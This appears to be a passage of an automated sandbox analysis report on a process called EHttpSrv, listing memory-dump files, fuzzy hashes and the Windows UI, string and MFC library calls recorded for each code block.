                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #3396$#2255#2361#2860MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1954174168-0
                                                                                                                • Opcode ID: 958238bf71ac4715f8ddfb8c01e7def0aeec5b4875cd1fe542732df0f3a72233
                                                                                                                • Instruction ID: 126db6bb1b3f769ee96d377db79cbabebc7581eef1bc95ec5cdcf709eca0c113
                                                                                                                • Opcode Fuzzy Hash: 958238bf71ac4715f8ddfb8c01e7def0aeec5b4875cd1fe542732df0f3a72233
                                                                                                                • Instruction Fuzzy Hash: 6B418F722042056FC304CF68D880FABB7E5EB98324F00C66DFA599B291DA74E845CB91
                                                                                                                APIs
                                                                                                                • wcschr.MSVCR80 ref: 20402E94
                                                                                                                • wcschr.MSVCR80 ref: 20402EA2
                                                                                                                • wcschr.MSVCR80 ref: 20402EB5
                                                                                                                • wcschr.MSVCR80 ref: 20402EC3
                                                                                                                • wcschr.MSVCR80 ref: 20402ED4
                                                                                                                • memcpy.MSVCR80(?,?,?), ref: 20402F21
                                                                                                                  • Part of subcall function 20402BB0: wcschr.MSVCR80 ref: 20402BDC
                                                                                                                  • Part of subcall function 20402BB0: realloc.MSVCR80 ref: 20402C0E
                                                                                                                  • Part of subcall function 20402BB0: free.MSVCR80 ref: 20402C6B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcschr$freememcpyrealloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 167584904-0
                                                                                                                • Opcode ID: 79e9b2ff87d29b74a77624e85320ed0fe6e6514f70e8057716c5544e99aabd57
                                                                                                                • Instruction ID: 3d209cc773c25d1276801a86a55cdadc7f4b325e4ec272aeb9d5ae2cd2e00bf9
                                                                                                                • Opcode Fuzzy Hash: 79e9b2ff87d29b74a77624e85320ed0fe6e6514f70e8057716c5544e99aabd57
                                                                                                                • Instruction Fuzzy Hash: 5131A7716043055BD714DEA5DD81BBBB3E9DF94645F00843CFE48A7381E678AE0586A2
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #4026$#314#6751
                                                                                                                • String ID:
                                                                                                                • API String ID: 624441723-0
                                                                                                                • Opcode ID: 7c2ac32a584af543b31e7d4ba2eba0a92f74952405558f1ebb88d8a70f75d7cd
                                                                                                                • Instruction ID: 80e23fc9a9e5395550071c8955333a20239846f9909a3b99e3d10eb53f791a7a
                                                                                                                • Opcode Fuzzy Hash: 7c2ac32a584af543b31e7d4ba2eba0a92f74952405558f1ebb88d8a70f75d7cd
                                                                                                                • Instruction Fuzzy Hash: 1F41C071A087019FE310CF98C8C5BAAB7E0FB84764F44CA2DE9555B7D0DB39A905CB61
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2579#280#3793#578ClientScreenwcsncpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 3590633572-0
                                                                                                                • Opcode ID: 3061a5369420997e25cd18ecfc2a179ae1df2e6ddf54eae5e46729ca15c6e81d
                                                                                                                • Instruction ID: fa1ad2b7282cafb1daa863134dea4cd9b2a47bc730152b5a941792659c6a9c33
                                                                                                                • Opcode Fuzzy Hash: 3061a5369420997e25cd18ecfc2a179ae1df2e6ddf54eae5e46729ca15c6e81d
                                                                                                                • Instruction Fuzzy Hash: 2C317E715087029BD304DF58CC45B5ABBE8EB89728F20CA2DF86593391EB39E944CE56
                                                                                                                APIs
                                                                                                                • GetObjectW.GDI32(?,0000005C,?), ref: 20421636
                                                                                                                  • Part of subcall function 20421700: wcscpy_s.MSVCR80 ref: 204217EF
                                                                                                                • GetObjectW.GDI32(?,0000005C,?), ref: 20421656
                                                                                                                • GetObjectW.GDI32(?,0000005C,?), ref: 2042167A
                                                                                                                • #762.MFC80U(00000008,FEEA6C22,?,?,?), ref: 2042168D
                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 204216C4
                                                                                                                • #1271.MFC80U(00000000), ref: 204216CD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$#1271#762CreateFontIndirectwcscpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 59788365-0
                                                                                                                • Opcode ID: 6707239445c955c7e539035827d95cdf433977ea8fd111f2add55a54eca427fa
                                                                                                                • Instruction ID: 4e5803fff410f36f8d1a55258727d8a2190b7b04d5b7813e904d9cd8e91b01ee
                                                                                                                • Opcode Fuzzy Hash: 6707239445c955c7e539035827d95cdf433977ea8fd111f2add55a54eca427fa
                                                                                                                • Instruction Fuzzy Hash: 7B314D716087459FD720CF64D881FABB7E9FB94604F00892DF64997290DB78E909CBA2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20423790: #572.MFC80U(FEEA6C22,20428001,00000000,2047A038,000000FF,20422C6F,204280D9,20428085,20428001,000000FF,FEEA6C22,?,?,?,2047B870,000000FF), ref: 204237B7
                                                                                                                • #310.MFC80U(?,FEEA6C22,00000000,?,00000000,?,2047AE6F,000000FF,20472632,?), ref: 20430DFC
                                                                                                                • #557.MFC80U ref: 20430E0A
                                                                                                                • #310.MFC80U ref: 20430E17
                                                                                                                • #557.MFC80U ref: 20430E25
                                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 20430EA4
                                                                                                                • SetRectEmpty.USER32(?), ref: 20430F17
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310#557$#572CursorEmptyLoadRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 3215843377-0
                                                                                                                • Opcode ID: cb476f6742f4f7be8deaae5ffae4be086f958656c7a3645eb977df059f44e975
                                                                                                                • Instruction ID: 2bb2124f3408417cacaab87f7974d43fdc1ced6e54dd9e3e44e2c068e37398bd
                                                                                                                • Opcode Fuzzy Hash: cb476f6742f4f7be8deaae5ffae4be086f958656c7a3645eb977df059f44e975
                                                                                                                • Instruction Fuzzy Hash: 5A41E7B1408B818ED321CF79C885B87FBE4BB65714F548D1EE1EA83251CB786148CBA2
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 20443278
                                                                                                                • #2310.MFC80U(?,00000161,00000004), ref: 204432AA
                                                                                                                • #4026.MFC80U(0000015E), ref: 204432BD
                                                                                                                • #5149.MFC80U(00000000), ref: 204432C7
                                                                                                                • #5149.MFC80U(00000000), ref: 204432D4
                                                                                                                  • Part of subcall function 2042E670: #6751.MFC80U(00000000,?,2042E5B8,00000000,FEEA6C22), ref: 2042E688
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2044332A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #5149#6751$#2310#314#4026
                                                                                                                • String ID:
                                                                                                                • API String ID: 1935839213-0
                                                                                                                • Opcode ID: a839281dc79383c955cb29c32a29cefc9a3d5eff2f851f3a21d5c4233857ed16
                                                                                                                • Instruction ID: 95da39ba3c92a4bc929dfcd721f6019bdc6ab8c86110e5e0e6207edb284bf60f
                                                                                                                • Opcode Fuzzy Hash: a839281dc79383c955cb29c32a29cefc9a3d5eff2f851f3a21d5c4233857ed16
                                                                                                                • Instruction Fuzzy Hash: 7B31BF726087009BE700CF54DC85B5ABBE4FB94B2AF00C62DFA519B3D0EB399904CB95
                                                                                                                APIs
                                                                                                                • #5829.MFC80U ref: 20438653
                                                                                                                • #3342.MFC80U ref: 2043866B
                                                                                                                • GetScrollPos.USER32(?,00000002), ref: 20438679
                                                                                                                • GetClientRect.USER32(?,?), ref: 204386CB
                                                                                                                • #6061.MFC80U(00000000,?,00000003,00000000,00000000,00000015), ref: 204386E8
                                                                                                                • #5053.MFC80U(?,?,?,00000000,?,00000003,00000000,00000000,00000015), ref: 204386FF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #3342#5053#5829#6061ClientRectScroll
                                                                                                                • String ID:
                                                                                                                • API String ID: 3428498704-0
                                                                                                                • Opcode ID: 510ea35aade66fe04555974c49d38585692205ebdea659769a8c91a3b845935b
                                                                                                                • Instruction ID: faa25bfa3efe4b003f9fa37e8d05ddedd5c73f56c3e317c5f132f19a95779bc4
                                                                                                                • Opcode Fuzzy Hash: 510ea35aade66fe04555974c49d38585692205ebdea659769a8c91a3b845935b
                                                                                                                • Instruction Fuzzy Hash: 4121C772204700AFD314DF65CC86F6AB7AABBC8718F20C61DF95597690EE78AD018752
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1176#310#3756#578#774#776
                                                                                                                • String ID:
                                                                                                                • API String ID: 1501068398-0
                                                                                                                • Opcode ID: 91aa2c8e6c1f7e646a1858a9b7e0583eb1c2fc4c340d20cd71adb63df5d13810
                                                                                                                • Instruction ID: 534fe2c38459ee26a4300b236243343f8cf4d76be2ead2851599a08232dda2c4
                                                                                                                • Opcode Fuzzy Hash: 91aa2c8e6c1f7e646a1858a9b7e0583eb1c2fc4c340d20cd71adb63df5d13810
                                                                                                                • Instruction Fuzzy Hash: 4A214F71508B419FC714DF58D880B4AB7E4FF98728F108B2DF866933A1DB38A909CB91
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,?,2047BB2C,000000FF,2040E34E,?,?,?,?,20464AC2,?,?,?,?), ref: 2040C964
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,?,2047BB2C,000000FF,2040E34E,?,?,?,?,20464AC2,?,?,?,?), ref: 2040C974
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,?,2047BB2C,000000FF,2040E34E,?,?,?,?,20464AC2,?,?,?,?), ref: 2040C990
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,?,2047BB2C,000000FF,2040E34E,?,?,?,?,20464AC2,?,?,?,?), ref: 2040C9AC
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,?,2047BB2C,000000FF,2040E34E,?,?,?,?,20464AC2,?,?,?,?), ref: 2040C9C8
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,?,2047BB2C,000000FF,2040E34E,?,?,?,?,20464AC2,?,?,?,?), ref: 2040C9E7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 2b07dee99d85256ead5c4b3a1e0c4762968547d79fd58e5faf9f8336b2089ed3
                                                                                                                • Instruction ID: f65c931a0d252e298a1c7162bb7c7cfd43a9f6234d6beb007c26361baf17acd5
                                                                                                                • Opcode Fuzzy Hash: 2b07dee99d85256ead5c4b3a1e0c4762968547d79fd58e5faf9f8336b2089ed3
                                                                                                                • Instruction Fuzzy Hash: 0B216DF19047808BD721DFA48841B57B7E8AF10A18F40CE2DE89997790E37DE608CBD2
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,?,20462A82,?,?,00000000,?,?), ref: 2046407B
                                                                                                                • #764.MFC80U(?,?,20462A82,?,?,00000000,?,?), ref: 20464094
                                                                                                                • #764.MFC80U(?,?,20462A82,?,?,00000000,?,?), ref: 204640B3
                                                                                                                • #764.MFC80U(?,?,20462A82,?,?,00000000,?,?), ref: 204640D8
                                                                                                                • #764.MFC80U(?,?,20462A82,?,?,00000000,?,?), ref: 204640FD
                                                                                                                • #764.MFC80U(?,?,20462A82,?,?,00000000,?,?), ref: 20464122
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 21bc7dc6c0a5576b8b1e108272b6e18468e01767883acd5b2ffdba6672f1f9ac
                                                                                                                • Instruction ID: e585b21587b3ce3f0501f9cf68ed5c0128c1d7ad264244d93a85d520306c797b
                                                                                                                • Opcode Fuzzy Hash: 21bc7dc6c0a5576b8b1e108272b6e18468e01767883acd5b2ffdba6672f1f9ac
                                                                                                                • Instruction Fuzzy Hash: 232194F1901B108BD6219FAA9841B97F6F9AFA0600F548D1EE1AED3224E779B4448F51
                                                                                                                APIs
                                                                                                                • #1921.MFC80U(FEEA6C22,00000000,?,?,?,00000000,2047DB16,000000FF,20470C33,FEEA6C22,-00003AB4,?,00000000,2047F476,000000FF,2046254B), ref: 20460090
                                                                                                                • #1921.MFC80U(FEEA6C22,00000000,?,?,?,00000000,2047DB16,000000FF,20470C33,FEEA6C22,-00003AB4,?,00000000,2047F476,000000FF,2046254B), ref: 2046009D
                                                                                                                  • Part of subcall function 20431180: DestroyCursor.USER32(?), ref: 204311C1
                                                                                                                  • Part of subcall function 20431180: #764.MFC80U(?,?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431225
                                                                                                                  • Part of subcall function 20431180: #745.MFC80U(?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431235
                                                                                                                  • Part of subcall function 20431180: #578.MFC80U(?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431242
                                                                                                                  • Part of subcall function 20431180: #745.MFC80U ref: 20431250
                                                                                                                  • Part of subcall function 20431180: #578.MFC80U ref: 2043125D
                                                                                                                  • Part of subcall function 20431180: #741.MFC80U ref: 2043126D
                                                                                                                  • Part of subcall function 2045D000: free.MSVCR80 ref: 2045D058
                                                                                                                  • Part of subcall function 2045D000: #6003.MFC80U(00000000,000000FF,FEEA6C22,?,?,?,?,00000000,204798FB,000000FF,2045D691,?,?,?,00000000,2047A52C), ref: 2045D06E
                                                                                                                  • Part of subcall function 2045D000: #722.MFC80U(00000000,000000FF,FEEA6C22,?,?,?,?,00000000,204798FB,000000FF,2045D691,?,?,?,00000000,2047A52C), ref: 2045D07D
                                                                                                                • #651.MFC80U(FEEA6C22,00000000,?,?,?,00000000,2047DB16,000000FF,20470C33,FEEA6C22,-00003AB4,?,00000000,2047F476,000000FF,2046254B), ref: 204600D9
                                                                                                                • #651.MFC80U(FEEA6C22,00000000,?,?,?,00000000,2047DB16,000000FF,20470C33,FEEA6C22,-00003AB4,?,00000000,2047F476,000000FF,2046254B), ref: 204600E5
                                                                                                                • #658.MFC80U(FEEA6C22,00000000,?,?,?,00000000,2047DB16,000000FF,20470C33,FEEA6C22,-00003AB4,?,00000000,2047F476,000000FF,2046254B), ref: 204600F5
                                                                                                                • #718.MFC80U(?,00000004,00000002,6C4E60B9,FEEA6C22,00000000,?,?,?,00000000,2047DB16,000000FF,20470C33,FEEA6C22,-00003AB4,?), ref: 2046011F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1921#578#651#745$#6003#658#718#722#741#764CursorDestroyfree
                                                                                                                • String ID:
                                                                                                                • API String ID: 2094964046-0
                                                                                                                • Opcode ID: 45e935d5c378266e553fa27c6ea45fee95c4babfb8c822c790624cf8745d6752
                                                                                                                • Instruction ID: 97fa06e62d3a3789af2fe61a12c763a3e0c8e09cd1a0fd74276bfca5eb1cd016
                                                                                                                • Opcode Fuzzy Hash: 45e935d5c378266e553fa27c6ea45fee95c4babfb8c822c790624cf8745d6752
                                                                                                                • Instruction Fuzzy Hash: EB21C2701487818ED315DF65C851BABBBE4EBA4718F40C91DF0A647291CB7D690DCFA2
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22), ref: 2044A62B
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 2044A64D
                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000100), ref: 2044A66F
                                                                                                                • #2310.MFC80U(?,?,?), ref: 2044A68B
                                                                                                                • #896.MFC80U(?), ref: 2044A69C
                                                                                                                • #578.MFC80U ref: 2044A6B1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$#2310#310#578#896DateFileFormatSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 1214211288-0
                                                                                                                • Opcode ID: 6ed68abcd28ce48f2fbeb676e58b4509ff3b508b12a135595b734adc215a4cd3
                                                                                                                • Instruction ID: 05188214ffbfdb47170fc93420c0872eb3a8fe3c16bd2a1318f7243c7ef8323f
                                                                                                                • Opcode Fuzzy Hash: 6ed68abcd28ce48f2fbeb676e58b4509ff3b508b12a135595b734adc215a4cd3
                                                                                                                • Instruction Fuzzy Hash: A62142B1108741AFD324DF64CC89FAAB7E4FB88715F00892DF196862E0EF789544DB52
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,76945540,2044717A), ref: 20417A7B
                                                                                                                • #764.MFC80U(?,76945540,2044717A), ref: 20417A97
                                                                                                                • #764.MFC80U(?,76945540,2044717A), ref: 20417AB9
                                                                                                                • #764.MFC80U(?,76945540,2044717A), ref: 20417AD2
                                                                                                                • #764.MFC80U(?,76945540,2044717A), ref: 20417AEB
                                                                                                                • #764.MFC80U(?,76945540,2044717A), ref: 20417B07
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
